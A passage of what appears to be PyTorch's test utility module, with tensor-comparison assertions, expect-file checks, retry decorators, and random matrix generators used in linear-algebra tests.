return debug_msg
else:
return f"\n{msg}" if debug_msg is None else f"{debug_msg}\n{msg}"
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means test is written wrongly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
def _is_dict(self, obj):
return isinstance(obj, (dict, torch._C.ScriptDict)) # type: ignore[attr-defined]
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified, then the other must be too"
debug_msg: Optional[str] = None
if x is None or y is None:
self.assertTrue(x is None and y is None)
# Tensor x Number and Number x Tensor comparisons
elif isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
debug_msg = ("Attempted to compare with different is_sparse settings: "
f"Expected: {x.is_sparse}; Actual: {y.is_sparse}.")
super().assertEqual(x.is_sparse, y.is_sparse, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
debug_msg = ("Attempted to compare with different is_quantized settings: "
f"Expected: {x.is_quantized}; Actual: {y.is_quantized}.")
super().assertEqual(x.is_quantized, y.is_quantized, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
if x.is_sparse:
if x.size() != y.size():
debug_msg_sparse = ("Attempted to compare equality of tensors with different sizes: "
f"Expected: {x.size()}; Actual: {y.size()}.")
super().assertTrue(False, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg_sparse))
x = x.coalesce()
y = y.coalesce()
indices_result, debug_msg_indices = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result:
assert debug_msg_indices is not None
debug_msg = "Sparse tensor indices failed to compare as equal! " + debug_msg_indices
super().assertTrue(indices_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
values_result, debug_msg_values = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result:
assert debug_msg_values is not None
debug_msg = "Sparse tensor values failed to compare as equal! " + debug_msg_values
super().assertTrue(values_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg_compare = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_compare is not None
debug_msg = "Quantized representations failed to compare as equal! " + debug_msg_compare
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
result, debug_msg_generic = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_generic is not None
debug_msg = "Tensors failed to compare as equal!" + debug_msg_generic
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif isinstance(x, (np.ndarray, torch.Tensor)) or isinstance(y, (np.ndarray, torch.Tensor)):
def maybe_to_tensor(a: Union[np.ndarray, torch.Tensor]) -> Union[np.ndarray, torch.Tensor]:
if not isinstance(a, np.ndarray):
return a
try:
return torch.from_numpy(a)
except TypeError:
# This happens if the dtype is non-numeric or not supported by torch
return a
def maybe_to_list(a: Any) -> Any:
if not isinstance(a, (np.ndarray, torch.Tensor)):
return a
return a.tolist()
x = maybe_to_tensor(x)
y = maybe_to_tensor(y)
if isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
self.assertEqual(
x, y, atol=atol, rtol=rtol, msg=msg, exact_dtype=exact_dtype, exact_device=exact_device
)
else:
# In case we can't convert the array to a tensor, we fall back to comparing x and y as iterables
self.assertEqual(
maybe_to_list(x),
maybe_to_list(y),
atol=atol,
rtol=rtol,
msg=msg,
exact_dtype=exact_dtype,
exact_device=exact_device
)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
debug_msg = ("Attempted to compare [string] types: "
f"Expected: {repr(x)}; Actual: {repr(y)}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif type(x) == set and type(y) == set:
debug_msg = ("Attempted to compare [set] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif self._is_dict(x) and self._is_dict(y):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
debug_msg = ("Attempted to compare [type] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif is_iterable(x) and is_iterable(y):
debug_msg = ("Attempted to compare the lengths of [iterable] types: "
f"Expected: {len(x)}; Actual: {len(y)}.")
super().assertEqual(len(x), len(y), msg=self._get_assert_msg(msg, debug_msg=debug_msg))
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
super().assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg_scalars = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result:
assert debug_msg_scalars is not None
debug_msg = "Scalars failed to compare as equal! " + debug_msg_scalars
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
super().assertEqual(x, y, msg=msg)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *, # type: ignore[override]
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used simulate deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaises(self, expected_exception, *args, **kwargs):
if self._ignore_not_implemented_error:
context: Optional[AssertRaisesContextIgnoreNotImplementedError] = \
AssertRaisesContextIgnoreNotImplementedError(expected_exception, self) # type: ignore[call-arg]
try:
return context.handle('assertRaises', args, kwargs) # type: ignore[union-attr]
finally:
# see https://bugs.python.org/issue23890
context = None
else:
return super().assertRaises(expected_exception, *args, **kwargs)
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaisesRegex(self, expected_exception, expected_regex, *args, **kwargs):
if self._ignore_not_implemented_error:
context = AssertRaisesContextIgnoreNotImplementedError( # type: ignore[call-arg]
expected_exception, self, expected_regex)
return context.handle('assertRaisesRegex', args, kwargs) # type: ignore[attr-defined]
else:
return super().assertRaisesRegex(expected_exception, expected_regex, *args, **kwargs)
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def assertWarnsOnceRegex(self, category, regex=''):
"""Context manager for code that *must always* warn
This filters expected warnings from the test and fails if
the expected warning is not caught. It uses set_warn_always() to force
TORCH_WARN_ONCE to behave like TORCH_WARN
"""
pattern = re.compile(regex)
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
yield
if len(ws) == 0:
self.fail('no warning caught')
self.assertTrue(any([type(w.message) is category for w in ws]))
self.assertTrue(
any([re.match(pattern, str(w.message)) for w in ws]),
f'{pattern}, {[w.message for w in ws if type(w.message) is category]}')
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
# Adjust for producer_version, leave s unmodified
s_tag = re.sub(r'(producer_version): "[0-9.]*"',
r'\1: "CURRENT_VERSION"', s)
f.write(s_tag)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id)) from None
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "CURRENT_VERSION"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
def assertGreaterAlmostEqual(self, first, second, places=None, msg=None, delta=None):
"""Assert that ``first`` is greater than or almost equal to ``second``.
The equality of ``first`` and ``second`` is determined in a similar way to
the ``assertAlmostEqual`` function of the standard library.
"""
if delta is not None and places is not None:
raise TypeError("specify delta or places not both")
if first >= second:
return
diff = second - first
if delta is not None:
if diff <= delta:
return
standardMsg = f"{first} not greater than or equal to {second} within {delta} delta"
else:
if places is None:
places = 7
if round(diff, places) == 0:
return
standardMsg = f"{first} not greater than or equal to {second} within {places} places"
msg = self._formatMessage(msg, standardMsg)
raise self.failureException(msg)
# run code in subprocess and capture exceptions.
@staticmethod
def run_process_no_exception(code, env=None):
import subprocess
popen = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
(stdout, stderr) = popen.communicate()
return (stdout, stderr)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
# remove IN_CI flag since this is a wrapped test process.
# IN_CI flag should be set in the parent process only.
if "IN_CI" in env.keys():
del env["IN_CI"]
(stdout, stderr) = TestCase.run_process_no_exception(code, env=env)
return stderr.decode('ascii')
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError as e:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg) from e
def find_free_port():
"""
Finds an available port and returns that port number.
NOTE: If this function is being used to allocate a port to Store (or
indirectly via init_process_group or init_rpc), it should be used
in conjuction with the `retry_on_connect_failures` decorator as there is a potential
race condition where the allocated port may become unavailable before it can be used
"""
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
return port
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE)):
"""Reruns a test if the test returns a RuntimeError and the exception
matches exactly with one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
tries_remaining = 10
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if str(error) in connect_errors:
tries_remaining -= 1
if tries_remaining == 0:
raise
time.sleep(random.random())
continue
raise
return wrapper
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e if skip_after_retries else e
return f_retry # true decorator
return deco_retry
# Methods for matrix generation
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, vh = torch.linalg.svd(A, full_matrices=False)
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return (u * s.to(dtype).unsqueeze(-2)) @ vh
def random_well_conditioned_matrix(*shape, dtype, device, mean=1.0, sigma=0.001):
"""
Returns a random rectangular matrix (batch of matrices)
with singular values sampled from a Gaussian with
mean `mean` and standard deviation `sigma`.
The smaller the `sigma`, the better conditioned
the output matrix is.
"""
primitive_dtype = {
torch.float: torch.float,
torch.double: torch.double,
torch.cfloat: torch.float,
torch.cdouble: torch.double
}
x = torch.rand(shape, dtype=dtype, device=device)
m = x.size(-2)
n = x.size(-1)
u, _, vh = torch.linalg.svd(x, full_matrices=False)
s = (torch.randn(*(shape[:-2] + (min(m, n),)), dtype=primitive_dtype[dtype], device=device) * sigma + mean) \
.sort(-1, descending=True).values.to(dtype)
return (u * s.unsqueeze(-2)) @ vh
# Returns a noncontiguous (tensor with the same shape and values as t
# The noncontiguous tensor is constructed such that elements in the innermost
# dimension are separated by zeros or (whenever possible) nans
# TODO: consider more complicated noncontiguity schemes
def noncontiguous_like(t):
# Short-circuits if t is already noncontiguous
if not t.is_contiguous():
return t
# Special-cases 0-dim tensors
if t.ndim == 0:
result = t.detach().unsqueeze(0).repeat_interleave(2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[0] = math.nan
else:
result[0] = 0
result.set_(result.storage(), 1, t.size(), ())
result.requires_grad_(t.requires_grad)
return result
# 1+ dim tensor case
result = torch.repeat_interleave(t.detach(), 2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[..., 1::2] = math.nan
else:
result[..., 1::2] = 0
strides = list(result.stride())
strides[-1] = strides[-1] * 2
result.set_(result.storage(), result.storage_offset(), t.size(), stride=tuple(strides))
result.requires_grad_(t.requires_grad)
return result
# TODO: remove this (prefer make_symmetric_matrices below)
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mT).div_(2)
return A
# Creates a symmetric matrix or batch of symmetric matrices
# Shape must be a square matrix or batch of square matrices
def make_symmetric_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
t = (t + t.mT).div_(2)
return t
def random_hermitian_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mH).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
"""
Returns a batch of random symmetric positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_symmetric_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return A @ A.mT
def random_hermitian_psd_matrix(matrix_size, *batch_dims, dtype=torch.double, device='cpu'):
"""
Returns a batch of random Hermitian positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)), dtype=dtype, device=device)
return A @ A.mH
# TODO: remove this (prefer make_symmetric_pd_matrices below)
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.mT) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
# Creates a symmetric positive-definite matrix or batch of
# such matrices
def make_symmetric_pd_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
i = torch.eye(shape[-1], device=device, dtype=dtype) * 1e-5
return t @ t.mT + i
def random_hermitian_pd_matrix(matrix_size, *batch_dims, dtype, device):
"""
Returns a batch of random Hermitian positive-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_pd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return A @ A.mH + torch.eye(matrix_size, dtype=dtype, device=device)
# TODO: remove this (prefer make_fullrank_matrices_with_distinct_singular_values below)
def random_fullrank_matrix_distinct_singular_value(matrix_size, *batch_dims,
**kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
if silent and not torch._C.has_lapack:
return torch.ones(matrix_size, matrix_size, dtype=dtype, device=device)
A = torch.randn(batch_dims + (matrix_size, matrix_size), dtype=dtype, device=device)
u, _, vh = torch.linalg.svd(A, full_matrices=False)
real_dtype = A.real.dtype if A.dtype.is_complex else A.dtype
s = torch.arange(1., matrix_size + 1, dtype=real_dtype, device=device).mul_(1.0 / (matrix_size + 1))
return (u * s.to(A.dtype)) @ vh
# Creates a full rank matrix with distinct signular values or
# a batch of such matrices
# Shape must be a square matrix or batch of square matrices
def make_fullrank_matrices_with_distinct_singular_values(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
u, _, vh = torch.linalg.svd(t, full_matrices=False)
# TODO: improve the handling of complex tensors here
real_dtype = t.real.dtype if t.dtype.is_complex else t.dtype
s = torch.arange(1., shape[-1] + 1, dtype=real_dtype, device=device).mul_(1.0 / (shape[-1] + 1))
return (u * s.to(dtype)) @ vh
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
u, _, vh = torch.linalg.svd(A, full_matrices=False)
k = min(rows, columns)
s = torch.linspace(1 / (k + 1), 1, k, dtype=dtype, device=device)
if singular:
# make matrix singular
s[k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0] = 0
return (u * s.unsqueeze(-2)) @ vh
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches to given density as the size
of the matrix is increased and a relatively small value of density
is specified but higher than min(rows, columns)/(rows * columns)
for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
indices_tensor = torch.tensor(indices)
A = torch.sparse_coo_tensor(indices_tensor, values, (rows, columns), device=device)
return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices_tensor = torch.tensor([icoords, jcoords])
return torch.sparse_coo_tensor(indices_tensor, values, (matrix_size, matrix_size), dtype=dtype, device=device)
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
# this helper method is to recursively
# clone the tensor-type input of operators tested by OpInfo
def clone_input_helper(input):
if isinstance(input, torch.Tensor):
return torch.clone(input)
if isinstance(input, Sequence):
return tuple(map(clone_input_helper, input))
return input
THESE_TAKE_WAY_TOO_LONG = {
'test_Conv3d_groups',
'test_conv_double_backward',
'test_conv_double_backward_groups',
'test_Conv3d_dilated',
'test_Conv3d_stride_padding',
'test_Conv3d_dilated_strided',
'test_Conv3d',
'test_Conv2d_dilated',
'test_ConvTranspose3d_dilated',
'test_ConvTranspose2d_dilated',
'test_snli',
'test_Conv2d',
'test_Conv2d_padding',
'test_ConvTranspose2d_no_bias',
'test_ConvTranspose2d',
'test_ConvTranspose3d',
'test_Conv2d_no_bias',
'test_matmul_4d_4d',
'test_multinomial_invalid_probs',
}
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
